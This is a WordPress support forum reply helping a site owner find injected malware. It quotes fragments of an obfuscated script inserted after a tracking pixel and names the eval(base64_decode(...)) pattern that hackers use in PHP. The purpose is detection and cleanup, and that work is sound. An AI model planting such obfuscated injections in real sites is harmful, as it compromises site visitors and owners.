Support » Plugins » Malware on wp site

Viewing 1 replies (of 1 total)
  • ?? Unfortunately the page is hacked. There is a block of (somewhat) obfuscated script being inserted into the page. When I check the code being returned by a request for the page right after this line of code (which is a legitimate line)

    <img src=”http:// ad . retargeter . com /seg?add=394782&t=2″ width=”1″ height=”1″ />

    there is some script being inserted, the script starts with

    <script type=’text/javascript’>var fsiwuk= “Eri”
    “hat”+”e” +””+ “s” ;var xzz1bpx3o

    I say somewhat obfuscated because most of the lines are like this

    (“”+”src” ,””+”h”+””+””+ “t” +””+”tp”+””+”:/”+””+””+ “/w” +

    They have broken up http:// by adding it togeter with +

    From where it appears in the page it looks like possibly it is in your footer?? I suggest you start by checking there. It is alos possiblr the hackers would use some obfuscated php code to write the script, use something like

    eval(base64_decode(‘ then a long string os seemingly random characters.

    You can see the entire block of script as it is appearing in the page here

Viewing 1 replies (of 1 total)
  • The topic ‘Malware on wp site’ is closed to new replies.